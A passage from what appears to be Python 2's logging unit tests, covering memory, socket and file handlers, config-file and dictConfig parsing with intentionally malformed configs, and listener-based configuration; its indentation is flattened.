# Not only 'Garrulous' is still missing, but also 'Sociable'
# and 'Taciturn'
('Boring', '11'),
('Chatterbox', '12'),
('Talkative', '14'),
('Verbose', '15'),
('Effusive', '17'),
('Terse', '18'),
('Silent', '20'),
])
finally:
if specific_filter:
self.root_logger.removeFilter(specific_filter)
handler.removeFilter(garr)
class MemoryHandlerTest(BaseTest):
"""Tests for the MemoryHandler."""
# Do not bother with a logger name group.
expected_log_pat = r"^[\w.]+ -> ([\w]+): ([\d]+)$"
def setUp(self):
BaseTest.setUp(self)
self.mem_hdlr = logging.handlers.MemoryHandler(10, logging.WARNING,
self.root_hdlr)
self.mem_logger = logging.getLogger('mem')
self.mem_logger.propagate = 0
self.mem_logger.addHandler(self.mem_hdlr)
def tearDown(self):
self.mem_hdlr.close()
BaseTest.tearDown(self)
def test_flush(self):
# The memory handler flushes to its target handler based on specific
# criteria (message count and message level).
self.mem_logger.debug(self.next_message())
self.assert_log_lines([])
self.mem_logger.info(self.next_message())
self.assert_log_lines([])
# This will flush because the level is >= logging.WARNING
self.mem_logger.warn(self.next_message())
lines = [
('DEBUG', '1'),
('INFO', '2'),
('WARNING', '3'),
]
self.assert_log_lines(lines)
for n in (4, 14):
for i in range(9):
self.mem_logger.debug(self.next_message())
self.assert_log_lines(lines)
# This will flush because it's the 10th message since the last
# flush.
self.mem_logger.debug(self.next_message())
lines = lines + [('DEBUG', str(i)) for i in range(n, n + 10)]
self.assert_log_lines(lines)
self.mem_logger.debug(self.next_message())
self.assert_log_lines(lines)
class ExceptionFormatter(logging.Formatter):
"""A special exception formatter."""
def formatException(self, ei):
return "Got a [%s]" % ei[0].__name__
class ConfigFileTest(BaseTest):
"""Reading logging config from a .ini-style config file."""
expected_log_pat = r"^([\w]+) \+\+ ([\w]+)$"
# config0 is a standard configuration.
config0 = """
[loggers]
keys=root
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config1 adds a little to the standard configuration.
config1 = """
[loggers]
keys=root,parser
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=
[logger_parser]
level=DEBUG
handlers=hand1
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config1a moves the handler to the root.
config1a = """
[loggers]
keys=root,parser
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[logger_parser]
level=DEBUG
handlers=
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config2 has a subtle configuration error that should be reported
config2 = config1.replace("sys.stdout", "sys.stbout")
# config3 has a less subtle configuration error
config3 = config1.replace("formatter=form1", "formatter=misspelled_name")
# config4 specifies a custom formatter class to be loaded
config4 = """
[loggers]
keys=root
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=NOTSET
handlers=hand1
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
class=""" + __name__ + """.ExceptionFormatter
format=%(levelname)s:%(name)s:%(message)s
datefmt=
"""
# config5 specifies a custom handler class to be loaded
config5 = config1.replace('class=StreamHandler', 'class=logging.StreamHandler')
# config6 uses ', ' delimiters in the handlers and formatters sections
config6 = """
[loggers]
keys=root,parser
[handlers]
keys=hand1, hand2
[formatters]
keys=form1, form2
[logger_root]
level=WARNING
handlers=
[logger_parser]
level=DEBUG
handlers=hand1
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[handler_hand2]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stderr,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
[formatter_form2]
format=%(message)s
datefmt=
"""
# config7 adds a compiler logger.
config7 = """
[loggers]
keys=root,parser,compiler
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[logger_compiler]
level=DEBUG
handlers=
propagate=1
qualname=compiler
[logger_parser]
level=DEBUG
handlers=
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
def apply_config(self, conf):
file = cStringIO.StringIO(textwrap.dedent(conf))
logging.config.fileConfig(file)
def test_config0_ok(self):
# A simple config file which overrides the default settings.
with captured_stdout() as output:
self.apply_config(self.config0)
logger = logging.getLogger()
# Won't output anything
logger.info(self.next_message())
# Outputs a message
logger.error(self.next_message())
self.assert_log_lines([
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config1_ok(self, config=config1):
# A config file defining a sub-parser as well.
with captured_stdout() as output:
self.apply_config(config)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config2_failure(self):
# A simple config file which overrides the default settings.
self.assertRaises(StandardError, self.apply_config, self.config2)
def test_config3_failure(self):
# A simple config file which overrides the default settings.
self.assertRaises(StandardError, self.apply_config, self.config3)
def test_config4_ok(self):
# A config file specifying a custom formatter class.
with captured_stdout() as output:
self.apply_config(self.config4)
logger = logging.getLogger()
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEqual(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config5_ok(self):
self.test_config1_ok(config=self.config5)
def test_config6_ok(self):
self.test_config1_ok(config=self.config6)
def test_config7_ok(self):
with captured_stdout() as output:
self.apply_config(self.config1a)
logger = logging.getLogger("compiler.parser")
# See issue #11424. compiler-hyphenated sorts
# between compiler and compiler.xyz and this
# was preventing compiler.xyz from being included
# in the child loggers of compiler because of an
# overzealous loop termination condition.
hyphenated = logging.getLogger('compiler-hyphenated')
# All will output a message
logger.info(self.next_message())
logger.error(self.next_message())
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
('CRITICAL', '3'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with captured_stdout() as output:
self.apply_config(self.config7)
logger = logging.getLogger("compiler.parser")
self.assertFalse(logger.disabled)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
# Will not appear
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '4'),
('ERROR', '5'),
('INFO', '6'),
('ERROR', '7'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
class LogRecordStreamHandler(StreamRequestHandler):
"""Handler for a streaming logging request. It saves the log message in the
TCP server's 'log_output' attribute."""
TCP_LOG_END = "!!!END!!!"
def handle(self):
"""Handle multiple requests - each expected to be of 4-byte length,
followed by the LogRecord in pickle format. Logs the record
according to whatever policy is configured locally."""
while True:
chunk = self.connection.recv(4)
if len(chunk) < 4:
break
slen = struct.unpack(">L", chunk)[0]
chunk = self.connection.recv(slen)
while len(chunk) < slen:
chunk = chunk + self.connection.recv(slen - len(chunk))
obj = self.unpickle(chunk)
record = logging.makeLogRecord(obj)
self.handle_log_record(record)
def unpickle(self, data):
return cPickle.loads(data)
def handle_log_record(self, record):
# If the end-of-messages sentinel is seen, tell the server to
# terminate.
if self.TCP_LOG_END in record.msg:
self.server.abort = 1
return
self.server.log_output += record.msg + "\n"
class LogRecordSocketReceiver(ThreadingTCPServer):
"""A simple-minded TCP socket-based logging receiver suitable for test
purposes."""
allow_reuse_address = 1
log_output = ""
def __init__(self, host='localhost',
port=logging.handlers.DEFAULT_TCP_LOGGING_PORT,
handler=LogRecordStreamHandler):
ThreadingTCPServer.__init__(self, (host, port), handler)
self.abort = False
self.timeout = 0.1
self.finished = threading.Event()
def serve_until_stopped(self):
while not self.abort:
rd, wr, ex = select.select([self.socket.fileno()], [], [],
self.timeout)
if rd:
self.handle_request()
# Notify the main thread that we're about to exit
self.finished.set()
# close the listen socket
self.server_close()
@unittest.skipUnless(threading, 'Threading required for this test.')
class SocketHandlerTest(BaseTest):
"""Test for SocketHandler objects."""
def setUp(self):
"""Set up a TCP server to receive log messages, and a SocketHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
self.tcpserver = LogRecordSocketReceiver(port=0)
self.port = self.tcpserver.socket.getsockname()[1]
self.threads = [
threading.Thread(target=self.tcpserver.serve_until_stopped)]
for thread in self.threads:
thread.start()
self.sock_hdlr = logging.handlers.SocketHandler('localhost', self.port)
self.sock_hdlr.setFormatter(self.root_formatter)
self.root_logger.removeHandler(self.root_logger.handlers[0])
self.root_logger.addHandler(self.sock_hdlr)
def tearDown(self):
"""Shutdown the TCP server."""
try:
self.tcpserver.abort = True
del self.tcpserver
self.root_logger.removeHandler(self.sock_hdlr)
self.sock_hdlr.close()
for thread in self.threads:
thread.join(2.0)
finally:
BaseTest.tearDown(self)
def get_output(self):
"""Get the log output as received by the TCP server."""
# Signal the TCP receiver and wait for it to terminate.
self.root_logger.critical(LogRecordStreamHandler.TCP_LOG_END)
self.tcpserver.finished.wait(2.0)
return self.tcpserver.log_output
@unittest.skipIf(os.name=='java' and os._name=='nt',
'Blocks test completion on Jython Windows.')
def test_output(self):
# The log message sent to the SocketHandler is properly received.
logger = logging.getLogger("tcp")
logger.error("spam")
logger.debug("eggs")
self.assertEqual(self.get_output(), "spam\neggs\n")
class MemoryTest(BaseTest):
"""Test memory persistence of logger objects."""
def setUp(self):
"""Create a dict to remember potentially destroyed objects."""
BaseTest.setUp(self)
self._survivors = {}
def _watch_for_survival(self, *args):
"""Watch the given objects for survival, by creating weakrefs to
them."""
for obj in args:
key = id(obj), repr(obj)
self._survivors[key] = weakref.ref(obj)
def _assertTruesurvival(self):
"""Assert that all objects watched for survival have survived."""
# Trigger cycle breaking.
gc.collect()
dead = []
for (id_, repr_), ref in self._survivors.items():
if ref() is None:
dead.append(repr_)
if dead:
self.fail("%d objects should have survived "
"but have been destroyed: %s" % (len(dead), ", ".join(dead)))
def test_persistent_loggers(self):
# Logger objects are persistent and retain their configuration, even
# if visible references are destroyed.
self.root_logger.setLevel(logging.INFO)
foo = logging.getLogger("foo")
self._watch_for_survival(foo)
foo.setLevel(logging.DEBUG)
self.root_logger.debug(self.next_message())
foo.debug(self.next_message())
self.assert_log_lines([
('foo', 'DEBUG', '2'),
])
del foo
# foo has survived.
self._assertTruesurvival()
# foo has retained its settings.
bar = logging.getLogger("foo")
bar.debug(self.next_message())
self.assert_log_lines([
('foo', 'DEBUG', '2'),
('foo', 'DEBUG', '3'),
])
class EncodingTest(BaseTest):
def test_encoding_plain_file(self):
# In Python 2.x, a plain file object is treated as having no encoding.
log = logging.getLogger("test")
fn = tempfile.mktemp(".log")
# the non-ascii data we write to the log.
data = "foo\x80"
try:
handler = logging.FileHandler(fn)
log.addHandler(handler)
try:
# write non-ascii data to the log.
log.warning(data)
finally:
log.removeHandler(handler)
handler.close()
# check we wrote exactly those bytes, ignoring trailing \n etc
f = open(fn)
try:
self.assertEqual(f.read().rstrip(), data)
finally:
f.close()
finally:
if os.path.isfile(fn):
os.remove(fn)
def test_encoding_cyrillic_unicode(self):
log = logging.getLogger("test")
#Get a message in Unicode: Do svidanya in Cyrillic (meaning goodbye)
message = u'\u0434\u043e \u0441\u0432\u0438\u0434\u0430\u043d\u0438\u044f'
#Ensure it's written in a Cyrillic encoding
writer_class = codecs.getwriter('cp1251')
writer_class.encoding = 'cp1251'
stream = cStringIO.StringIO()
writer = writer_class(stream, 'strict')
handler = logging.StreamHandler(writer)
log.addHandler(handler)
try:
log.warning(message)
finally:
log.removeHandler(handler)
handler.close()
# check we wrote exactly those bytes, ignoring trailing \n etc
s = stream.getvalue()
#Compare against what the data should be when encoded in CP-1251
self.assertEqual(s, '\xe4\xee \xf1\xe2\xe8\xe4\xe0\xed\xe8\xff\n')
class WarningsTest(BaseTest):
def test_warnings(self):
with warnings.catch_warnings():
logging.captureWarnings(True)
try:
warnings.filterwarnings("always", category=UserWarning)
file = cStringIO.StringIO()
h = logging.StreamHandler(file)
logger = logging.getLogger("py.warnings")
logger.addHandler(h)
warnings.warn("I'm warning you...")
logger.removeHandler(h)
s = file.getvalue()
h.close()
self.assertTrue(s.find("UserWarning: I'm warning you...\n") > 0)
#See if an explicit file uses the original implementation
file = cStringIO.StringIO()
warnings.showwarning("Explicit", UserWarning, "dummy.py", 42,
file, "Dummy line")
s = file.getvalue()
file.close()
self.assertEqual(s,
"dummy.py:42: UserWarning: Explicit\n Dummy line\n")
finally:
logging.captureWarnings(False)
def formatFunc(format, datefmt=None):
return logging.Formatter(format, datefmt)
def handlerFunc():
return logging.StreamHandler()
class CustomHandler(logging.StreamHandler):
pass
class ConfigDictTest(BaseTest):
"""Reading logging config from a dictionary."""
expected_log_pat = r"^([\w]+) \+\+ ([\w]+)$"
# config0 is a standard configuration.
config0 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
# config1 adds a little to the standard configuration.
config1 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config2 has a subtle configuration error that should be reported
config2 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdbout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
#As config1 but with a misspelt level on a handler
config2a = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NTOSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
#As config1 but with a misspelt level on a logger
config2b = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WRANING',
},
}
# config3 has a less subtle configuration error
config3 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'misspelled_name',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config4 specifies a custom formatter class to be loaded
config4 = {
'version': 1,
'formatters': {
'form1' : {
'()' : __name__ + '.ExceptionFormatter',
'format' : '%(levelname)s:%(name)s:%(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'root' : {
'level' : 'NOTSET',
'handlers' : ['hand1'],
},
}
# As config4 but using an actual callable rather than a string
config4a = {
'version': 1,
'formatters': {
'form1' : {
'()' : ExceptionFormatter,
'format' : '%(levelname)s:%(name)s:%(message)s',
},
'form2' : {
'()' : __name__ + '.formatFunc',
'format' : '%(levelname)s:%(name)s:%(message)s',
},
'form3' : {
'()' : formatFunc,
'format' : '%(levelname)s:%(name)s:%(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
'hand2' : {
'()' : handlerFunc,
},
},
'root' : {
'level' : 'NOTSET',
'handlers' : ['hand1'],
},
}
# config5 specifies a custom handler class to be loaded
config5 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : __name__ + '.CustomHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config6 specifies a custom handler class to be loaded
# but has bad arguments
config6 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : __name__ + '.CustomHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
'9' : 'invalid parameter name',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
#config 7 does not define compiler.parser but defines compiler.lexer
#so compiler.parser should be disabled after applying it
config7 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.lexer' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
config8 = {
'version': 1,
'disable_existing_loggers' : False,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
'compiler.lexer' : {
},
},
'root' : {
'level' : 'WARNING',
},
}
config9 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'WARNING',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'NOTSET',
},
}
config9a = {
'version': 1,
'incremental' : True,
'handlers' : {
'hand1' : {
'level' : 'WARNING',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'INFO',
},
},
}
config9b = {
'version': 1,
'incremental' : True,
'handlers' : {
'hand1' : {
'level' : 'INFO',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'INFO',
},
},
}
#As config1 but with a filter added
config10 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'filters' : {
'filt1' : {
'name' : 'compiler.parser',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
'filters' : ['filt1'],
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'filters' : ['filt1'],
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
#As config1 but using cfg:// references
config11 = {
'version': 1,
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
#As config11 but missing the version key
config12 = {
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
#As config11 but using an unsupported version
config13 = {
'version': 2,
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
def apply_config(self, conf):
logging.config.dictConfig(conf)
def test_config0_ok(self):
# A simple config which overrides the default settings.
with captured_stdout() as output:
self.apply_config(self.config0)
logger = logging.getLogger()
# Won't output anything
logger.info(self.next_message())
# Outputs a message
logger.error(self.next_message())
self.assert_log_lines([
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config1_ok(self, config=config1):
# A config defining a sub-parser as well.
with captured_stdout() as output:
self.apply_config(config)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config2_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(StandardError, self.apply_config, self.config2)
def test_config2a_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(StandardError, self.apply_config, self.config2a)
def test_config2b_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(StandardError, self.apply_config, self.config2b)
def test_config3_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(StandardError, self.apply_config, self.config3)
def test_config4_ok(self):
# A config specifying a custom formatter class.
with captured_stdout() as output:
self.apply_config(self.config4)
#logger = logging.getLogger()
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEqual(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config4a_ok(self):
# A config specifying a custom formatter class.
with captured_stdout() as output:
self.apply_config(self.config4a)
#logger = logging.getLogger()
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEqual(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config5_ok(self):
self.test_config1_ok(config=self.config5)
def test_config6_failure(self):
self.assertRaises(StandardError, self.apply_config, self.config6)
def test_config7_ok(self):
with captured_stdout() as output:
self.apply_config(self.config1)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with captured_stdout() as output:
self.apply_config(self.config7)
logger = logging.getLogger("compiler.parser")
self.assertTrue(logger.disabled)
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '3'),
('ERROR', '4'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
#Same as test_config_7_ok but don't disable old loggers.
def test_config_8_ok(self):
with captured_stdout() as output:
self.apply_config(self.config1)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with captured_stdout() as output:
self.apply_config(self.config8)
logger = logging.getLogger("compiler.parser")
self.assertFalse(logger.disabled)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '3'),
('ERROR', '4'),
('INFO', '5'),
('ERROR', '6'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config_9_ok(self):
with captured_stdout() as output:
self.apply_config(self.config9)
logger = logging.getLogger("compiler.parser")
#Nothing will be output since both handler and logger are set to WARNING
logger.info(self.next_message())
self.assert_log_lines([], stream=output)
self.apply_config(self.config9a)
#Nothing will be output since both handler is still set to WARNING
logger.info(self.next_message())
self.assert_log_lines([], stream=output)
self.apply_config(self.config9b)
#Message should now be output
logger.info(self.next_message())
self.assert_log_lines([
('INFO', '3'),
], stream=output)
def test_config_10_ok(self):
with captured_stdout() as output:
self.apply_config(self.config10)
logger = logging.getLogger("compiler.parser")
logger.warning(self.next_message())
logger = logging.getLogger('compiler')
#Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger('compiler.lexer')
#Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger("compiler.parser.codegen")
#Output, as not filtered
logger.error(self.next_message())
self.assert_log_lines([
('WARNING', '1'),
('ERROR', '4'),
], stream=output)
def test_config11_ok(self):
self.test_config1_ok(self.config11)
def test_config12_failure(self):
self.assertRaises(StandardError, self.apply_config, self.config12)
def test_config13_failure(self):
self.assertRaises(StandardError, self.apply_config, self.config13)
@unittest.skipUnless(threading, 'listen() needs threading to work')
def setup_via_listener(self, text):
# Ask for a randomly assigned port (by using port 0)
t = logging.config.listen(0)
t.start()
t.ready.wait()
# Now get the port allocated
port = t.port
t.ready.clear()
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(2.0)
sock.connect(('localhost', port))
slen = struct.pack('>L', len(text))
s = slen + text
sentsofar = 0
left = len(s)
while left > 0:
sent = sock.send(s[sentsofar:])
sentsofar += sent
left -= sent
sock.close()
finally:
t.ready.wait(2.0)
logging.config.stopListening()
t.join(2.0)
def test_listen_config_10_ok(self):
with captured_stdout() as output:
self.setup_via_listener(json.dumps(self.config10))
logger = logging.getLogger("compiler.parser")
logger.warning(self.next_message())
logger = logging.getLogger('compiler')
#Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger('compiler.lexer')
#Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger("compiler.parser.codegen")
#Output, as not filtered
logger.error(self.next_message())
self.assert_log_lines([
('WARNING', '1'),
('ERROR', '4'),
], stream=output)
def test_listen_config_1_ok(self):
with captured_stdout() as output:
self.setup_via_listener(textwrap.dedent(ConfigFileTest.config1))
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
class ManagerTest(BaseTest):
def test_manager_loggerclass(self):
logged = []
class MyLogger(logging.Logger):
def _log(self, level, msg, args, exc_info=None, extra=None):
logged.append(msg)
man = logging.Manager(None)
self.assertRaises(TypeError, man.setLoggerClass, int)
man.setLoggerClass(MyLogger)
logger = man.getLogger('test')
logger.warning('should appear in logged')
logging.warning('should not appear in logged')
self.assertEqual(logged, ['should appear in logged'])
class ChildLoggerTest(BaseTest):
def test_child_loggers(self):
r = logging.getLogger()
l1 = logging.getLogger('abc')
l2 = logging.getLogger('def.ghi')
c1 = r.getChild('xyz')
c2 = r.getChild('uvw.xyz')
self.assertTrue(c1 is logging.getLogger('xyz'))
self.assertTrue(c2 is logging.getLogger('uvw.xyz'))
c1 = l1.getChild('def')
c2 = c1.getChild('ghi')
c3 = l1.getChild('def.ghi')
self.assertTrue(c1 is logging.getLogger('abc.def'))
self.assertTrue(c2 is logging.getLogger('abc.def.ghi'))
self.assertTrue(c2 is c3)
class HandlerTest(BaseTest):
@unittest.skipIf(os.name == 'nt' or (os.name == 'java' and os._name == 'nt'),
'WatchedFileHandler not appropriate for Windows.')
@unittest.skipUnless(threading, 'Threading required for this test.')
def test_race(self):
# Issue #14632 refers.
def remove_loop(fname, tries):
for _ in range(tries):
try:
os.unlink(fname)
except OSError:
pass
time.sleep(0.004 * random.randint(0, 4))
del_count = 500
log_count = 500
for delay in (False, True):
fd, fn = tempfile.mkstemp('.log', 'test_logging-3-')
os.close(fd)
remover = threading.Thread(target=remove_loop, args=(fn, del_count))
remover.daemon = True
remover.start()
h = logging.handlers.WatchedFileHandler(fn, delay=delay)
f = logging.Formatter('%(asctime)s: %(levelname)s: %(message)s')
h.setFormatter(f)
try:
for _ in range(log_count):
time.sleep(0.005)
r = logging.makeLogRecord({'msg': 'testing' })
h.handle(r)
finally:
remover.join()
try:
h.close()
except ValueError:
pass
if os.path.exists(fn):
